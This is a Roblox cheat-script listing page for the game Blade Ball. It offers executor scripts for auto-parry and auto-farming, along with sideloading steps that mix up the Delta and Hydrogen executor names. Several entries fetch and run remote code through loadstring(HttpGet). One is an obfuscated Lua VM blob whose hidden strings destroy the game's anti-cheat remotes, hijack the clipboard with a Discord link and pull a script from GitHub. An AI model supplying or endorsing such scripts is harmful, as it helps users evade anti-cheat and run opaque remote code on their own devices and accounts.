Blade Ball Scripts
Get Blade Ball Script completely free, you can copy directly and paste it in your executor, we have given lots of Blade ball scripts.
Are you tired of encountering to survive and score high in Roblox Blade Ball? Do you wish to automate many tasks, unlock new content, and get better scores? Make use of these Blade Ball scripts!
These Blade Ball scripts can be your powerful helpers that can make the game smooth for you. They can automate tasks like dodging the homing ball, upgrading abilities, and earning legendary skins. Here is a database of working Blade Ball scripts that can aid you improve your game.
This a very popular game on Roblox with more than 4M+ likes and 2.9B+ visits. Blade Ball is a super cool game where you have to dodge a fastball that follows you around! You obtain awesome powers to aid you and can make them even cooler.
The more you practice, the better you obtain, and you can show off with cool skins for your arms. It’s all about being fast and smart to win. Well, these scripts are very popular among Roblox players because they aid you in finishing tasks very smoothly in games.
If you have just started playing Blade Ball, it is likely that you are looking for Auto Partty script to survive in the game.
Notably, Auto Parry is not the only script that can be used to exploit Blade Ball. There are plenty of scripts that you can run right now.
Here we will not only share with you a list of all Blade Ball scripts but also explain how to run them using a Roblox Executor.
Just before we plunge into the warm depths of this article, know what is Blade Ball.
What is Blade Ball?
Blade Ball is one of the most popular Roblox games around .The fast and furious adventure is like a cross among dodgeball and battle royale. Its rules are simple. When players enter the playing field, the ball spawns and immediately begins to follow one of them around. In order to survive, this person has to hit the ball, making it fly even smoother in the direction in which it was hit.
Without any further ado, let’s get started:
All Blade Ball Scripts (2024)
Unlike other websites or publishers, we have provided all Blade Ball scripts here. Yes, you don’t need to click on any Download button or visit spammy websites to get a desired script.
You can copy your favorite Blade Ball Script from here:
Auto Parry:
Close Combat:
Anti Cheat:
Wizard Hub:
G.Setting = { Main = { [“AutoParry”] = true, [“EnabeldFpsBoost”] = true, — Spam Parry [“SpamParry”] = true, [“SpamKey”] = “Z”, — hold Z to spam parry — Auto Play [“AutoPlay”] = true, [“SelectMode”] = “TP”, — TP , AI (test) — Show Part [“ShowPart”] = true, [“ColorPart”] = Color3.fromRGB(0, 194, 36) } } loadstring(game:HttpGet(““))()
Inferno Hub:
Bedol Hub:
_G.UI_Size = 200 loadstring(game:HttpGet(“”))()
Lumin Head Loader
Auto Block Red Circle
— Auto-Block With Red Circle: loadstring(game:HttpGet(“”))() — Click “X” To Hit (for close battles)
Maru Hub Scripts
loadstring(game:HttpGet(“”))() loadstring(game:HttpGet(“”))()
Other Scripts
loadstring(game:HttpGet(‘’))() loadstring(game:HttpGet(“”))()
RV Parry
Drop Farm
_G.drop = true -- true/false loadstring(game:HttpGet(""))()
Reaper Hub
Farm Socks
_G.socks = true -- true/false loadstring(game:HttpGet(""))()
X7 Parry
Discrete Autofarm [HIGH WINRATE]
-- GET KEY HERE: --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] local StrToNumber = tonumber; local Byte = string.byte; local Char = string.char; local Sub = string.sub; local Subg = string.gsub; local Rep = string.rep; local Concat = table.concat; local Insert = table.insert; local LDExp = math.ldexp; local GetFEnv = getfenv or function() return _ENV; end; local Setmetatable = setmetatable; local PCall = pcall; local Select = select; local Unpack = unpack or table.unpack; local ToNumber = tonumber; local function VMCall(ByteString, vmenv, ...) local DIP = 1; local repeatNext; ByteString = Subg(Sub(ByteString, 5), "..", function(byte) if (Byte(byte, 2) == 79) then repeatNext = StrToNumber(Sub(byte, 1, 1)); return ""; else local a = Char(StrToNumber(byte, 16)); if repeatNext then local b = Rep(a, repeatNext); repeatNext = nil; return b; else return a; end end end); local function gBit(Bit, Start, End) if End then local Res = (Bit / (2 ^ (Start - 1))) % (2 ^ (((End - 1) - (Start - 1)) + 1)); return Res - (Res % 1); else local Plc = 2 ^ (Start - 1); return (((Bit % (Plc + Plc)) >= Plc) and 1) or 0; end end local function gBits8() local a = Byte(ByteString, DIP, DIP); DIP = DIP + 1; return a; end local function gBits16() local a, b = Byte(ByteString, DIP, DIP + 2); DIP = DIP + 2; return (b * 256) + a; end local function gBits32() local a, b, c, d = Byte(ByteString, DIP, DIP + 3); DIP = DIP + 4; return (d * 16777216) + (c * 65536) + (b * 256) + a; end local function gFloat() local Left = gBits32(); local Right = gBits32(); local IsNormal = 1; local Mantissa = (gBit(Right, 1, 20) * (2 ^ 32)) + Left; local Exponent = gBit(Right, 21, 31); local Sign = ((gBit(Right, 32) == 1) and -1) or 1; if (Exponent == 0) then if (Mantissa == 0) then return Sign * 0; else Exponent = 1; IsNormal = 0; end elseif (Exponent == 2047) then return ((Mantissa == 0) and (Sign * (1 / 0))) or (Sign * NaN); end return LDExp(Sign, Exponent - 1023) * (IsNormal + (Mantissa / (2 ^ 52))); end local function gString(Len) local Str; if not Len then Len = gBits32(); if (Len == 0) then return ""; end end Str = Sub(ByteString, DIP, (DIP + Len) - 1); DIP = DIP + Len; local FStr = {}; for Idx = 1, #Str do FStr[Idx] = Char(Byte(Sub(Str, Idx, Idx))); end return Concat(FStr); end local gInt = gBits32; local function _R(...) return {...}, Select("#", ...); end local function Deserialize() local Instrs = {}; local Functions = {}; local Lines = {}; local Chunk = {Instrs,Functions,nil,Lines}; local ConstCount = gBits32(); local Consts = {}; for Idx = 1, ConstCount do local Type = gBits8(); local Cons; if (Type == 1) then Cons = gBits8() ~= 0; elseif (Type == 2) then Cons = gFloat(); elseif (Type == 3) then Cons = gString(); end Consts[Idx] = Cons; end Chunk[3] = gBits8(); for Idx = 1, gBits32() do local Descriptor = gBits8(); if (gBit(Descriptor, 1, 1) == 0) then local Type = gBit(Descriptor, 2, 3); local Mask = gBit(Descriptor, 4, 6); local Inst = {gBits16(),gBits16(),nil,nil}; if (Type == 0) then Inst[3] = gBits16(); Inst[4] = gBits16(); elseif (Type == 1) then Inst[3] = gBits32(); elseif (Type == 2) then Inst[3] = gBits32() - (2 ^ 16); elseif (Type == 3) then Inst[3] = gBits32() - (2 ^ 16); Inst[4] = gBits16(); end if (gBit(Mask, 1, 1) == 1) then Inst[2] = Consts[Inst[2]]; end if (gBit(Mask, 2, 2) == 1) then Inst[3] = Consts[Inst[3]]; end if (gBit(Mask, 3, 3) == 1) then Inst[4] = Consts[Inst[4]]; end Instrs[Idx] = Inst; end end for Idx = 1, gBits32() do Functions[Idx - 1] = Deserialize(); end return Chunk; end local function Wrap(Chunk, Upvalues, Env) local Instr = Chunk[1]; local Proto = Chunk[2]; local Params = Chunk[3]; return function(...) local Instr = Instr; local Proto = Proto; local Params = Params; local _R = _R; local VIP = 1; local Top = -1; local Vararg = {}; local Args = {...}; local PCount = Select("#", ...) - 1; local Lupvals = {}; local Stk = {}; for Idx = 0, PCount do if (Idx >= Params) then Vararg[Idx - Params] = Args[Idx + 1]; else Stk[Idx] = Args[Idx + 1]; end end local Varargsz = (PCount - Params) + 1; local Inst; local Enum; while true do Inst = Instr[VIP]; Enum = Inst[1]; if (Enum <= 14) then if (Enum <= 6) then if (Enum <= 2) then if (Enum <= 0) then Stk[Inst[2]] = Env[Inst[3]]; elseif (Enum > 1) then Stk[Inst[2]](); else Stk[Inst[2]][Inst[3]] = Inst[4]; end elseif (Enum <= 4) then if (Enum == 3) then local A = Inst[2]; local Results, Limit = _R(Stk[A](Stk[A + 1])); Top = (Limit + A) - 1; local Edx = 0; for Idx = A, Top do Edx = Edx + 1; Stk[Idx] = Results[Edx]; end else Stk[Inst[2]] = Inst[3]; end elseif (Enum > 5) then Stk[Inst[2]][Inst[3]] = Inst[4]; else do return; end end elseif (Enum <= 10) then if (Enum <= 8) then if (Enum > 7) then local A = Inst[2]; Stk[A](Stk[A + 1]); else local A = Inst[2]; local T = Stk[A]; for Idx = A + 1, Top do Insert(T, Stk[Idx]); end end elseif (Enum > 9) then local A = Inst[2]; Stk[A] = Stk[A](Unpack(Stk, A + 1, Top)); else local A = Inst[2]; local T = Stk[A]; for Idx = A + 1, Top do Insert(T, Stk[Idx]); end end elseif (Enum <= 12) then if (Enum == 11) then local A = Inst[2]; Stk[A](Stk[A + 1]); else local A = Inst[2]; Stk[A](Unpack(Stk, A + 1, Inst[3])); end elseif (Enum > 13) then Stk[Inst[2]](); else do return; end end elseif (Enum <= 21) then if (Enum <= 17) then if (Enum <= 15) then local A = Inst[2]; Stk[A](Unpack(Stk, A + 1, Inst[3])); elseif (Enum > 16) then Stk[Inst[2]] = Inst[3]; else local A = Inst[2]; Stk[A] = Stk[A](Unpack(Stk, A + 1, Inst[3])); end elseif (Enum <= 19) then if (Enum > 18) then Stk[Inst[2]] = Stk[Inst[3]][Inst[4]]; else local A = Inst[2]; Stk[A] = Stk[A](Unpack(Stk, A + 1, Inst[3])); end elseif (Enum == 20) then Stk[Inst[2]] = Stk[Inst[3]][Inst[4]]; else Stk[Inst[2]] = {}; end elseif (Enum <= 25) then if (Enum <= 23) then if (Enum == 22) then local A = Inst[2]; local Results, Limit = _R(Stk[A](Unpack(Stk, A + 1, Inst[3]))); Top = (Limit + A) - 1; local Edx = 0; for Idx = A, Top do Edx = Edx + 1; Stk[Idx] = Results[Edx]; end else local A = Inst[2]; Stk[A] = Stk[A](Unpack(Stk, A + 1, Top)); end elseif (Enum > 24) then local A = Inst[2]; local Results, Limit = _R(Stk[A](Unpack(Stk, A + 1, Inst[3]))); Top = (Limit + A) - 1; local Edx = 0; for Idx = A, Top do Edx = Edx + 1; Stk[Idx] = Results[Edx]; end else Stk[Inst[2]] = Env[Inst[3]]; end elseif (Enum <= 27) then if (Enum > 26) then local A = Inst[2]; local B = Stk[Inst[3]]; Stk[A + 1] = B; Stk[A] = B[Inst[4]]; else local A = Inst[2]; local B = Stk[Inst[3]]; Stk[A + 1] = B; Stk[A] = B[Inst[4]]; end elseif (Enum == 28) then Stk[Inst[2]] = {}; else local A = Inst[2]; local Results, Limit = _R(Stk[A](Stk[A + 1])); Top = (Limit + A) - 1; local Edx = 0; for Idx = A, Top do Edx = Edx + 1; Stk[Idx] = Results[Edx]; end end VIP = VIP + 1; end end; end return Wrap(Deserialize(), {}, vmenv)(...); end VMCall("LOL!283O0003043O0067616D65030A3O0047657453657276696365030A3O005374617274657247756903073O00536574436F726503103O0053656E644E6F74696669636174696F6E03053O005469746C652O033O004C6F6703043O0054657874030B3O0065682044656C657465642003083O004475726174696F6E026O00144003043O0077616974026O00F03F03143O00536563757269747920762E332072656D6F76656403183O0072656D6F76696E6720736563727569747920747261636573026O33D33F031A3O007365637572697479203D206E6F742073656375726564204C4F4C029A5O99C93F03293O00596F752043616E204578656375746520416E7920426C6164652042612O6C20536372697074204E6F7703103O0053656375726974792052656D6F76656403253O0044657669636520436865636B65722052656D6F766564204C6F6164696E6720536372697074027O004003073O00446973636F726403443O004A6F696E204F757220446973636F7264202D20682O7470733A2O2F646973636F72642E2O672F2O55355A59466138665820636F7069656420746F20636C6970626F617264030C3O00736574636C6970626F617264031D3O00682O7470733A2O2F646973636F72642E2O672F2O55355A59466138665803113O005265706C69636174656453746F7261676503083O005365637572697479030B3O0052656D6F74654576656E7403073O0044657374726F79034O0003073O00506C6179657273030B3O004C6F63616C506C61796572030D3O00506C617965725363726970747303063O00436C69656E74030D3O00446576696365436865636B6572026O000840030A3O006C6F6164737472696E6703073O00482O7470476574034C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F2O3334352D632D612D742D732D752D732F2D626574612D2F6D61696E2F4175746F50612O72792E6C756100A03O00124O00013O00201B5O0002001204000200034O00103O0002000200201B5O0004001204000200054O001C00033O00030030010003000600070030010003000800090030010003000A000B2O000C3O0003000100124O000C3O0012040001000D4O000B3O0002000100124O00013O00201B5O0002001204000200034O00103O0002000200201B5O0004001204000200054O001C00033O000300300100030006000700300100030008000E0030010003000A000B2O000C3O0003000100124O000C3O0012040001000D4O000B3O0002000100124O00013O00201B5O0002001204000200034O00103O0002000200201B5O0004001204000200054O001C00033O000300300100030006000700300100030008000F0030010003000A000B2O000C3O0003000100124O000C3O001204000100104O000B3O0002000100124O00013O00201B5O0002001204000200034O00103O0002000200201B5O0004001204000200054O001C00033O00030030010003000600070030010003000800110030010003000A000B2O000C3O0003000100124O000C3O001204000100124O000B3O0002000100124O00013O00201B5O0002001204000200034O00103O0002000200201B5O0004001204000200054O001C00033O00030030010003000600070030010003000800130030010003000A000B2O000C3O0003000100124O000C3O001204000100104O000B3O0002000100124O00013O00201B5O0002001204000200034O00103O0002000200201B5O0004001204000200054O001C00033O00030030010003000600070030010003000800140030010003000A000B2O000C3O0003000100124O000C3O001204000100104O000B3O0002000100124O00013O00201B5O0002001204000200034O00103O0002000200201B5O0004001204000200054O001C00033O00030030010003000600070030010003000800150030010003000A000B2O000C3O0003000100124O000C3O001204000100164O000B3O0002000100124O00013O00201B5O0002001204000200034O00103O0002000200201B5O0004001204000200054O001C00033O00030030010003000600170030010003000800180030010003000A000B00122O000400193O0012040005001A4O0003000400054O000700033O00012O000C3O0003000100124O000C3O0012040001000D4O000B3O0002000100124O00013O00201B5O00020012040002001B4O00103O000200020020145O001C0020145O001D00201B5O001E2O000B3O0002000100124O00013O00201B5O00020012040002001B4O00103O000200020020145O001C0020145O001F00201B5O001E2O000B3O0002000100124O00013O00201B5O00020012040002001B4O00103O000200020020145O001C00201B5O001E2O000B3O0002000100124O00013O00201B5O0002001204000200204O00103O000200020020145O00210020145O00220020145O00230020145O002400201B5O001E2O000B3O0002000100124O000C3O001204000100254O000B3O0002000100124O00263O00122O000100013O00201B000100010027001204000300284O0016000100034O000A5O00022O000E3O000100012O00053O00017O00", GetFEnv(), ...); local link = "" loadstring(game:HttpGet(link))()
How to Run Blade Ball Script?
The process of running or executing Blade Ball scripts is pretty easy. However, if you don’t know the process then follow the steps written below:
- First, download Delta executor on your Mobile.
- Once downloaded, go to Download folder and then tap on the Hydrogen APK.
- Now, follow the on-screen instruction to install it on your device.
- Once installed, launch Delta Executor and login to your Roblox account.
- Once logged in, search for Blade Ball and then click on the Play button to load the game.
- Once the game is loaded, tap on the Hydrogen GUI and then go to the Script Hub.
- There, paste the desired Blade Ball script.
- After that, click on the Execute button.
- That’s it.
All Blade Ball Scripts

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Anime Card Master Script (February 2025)

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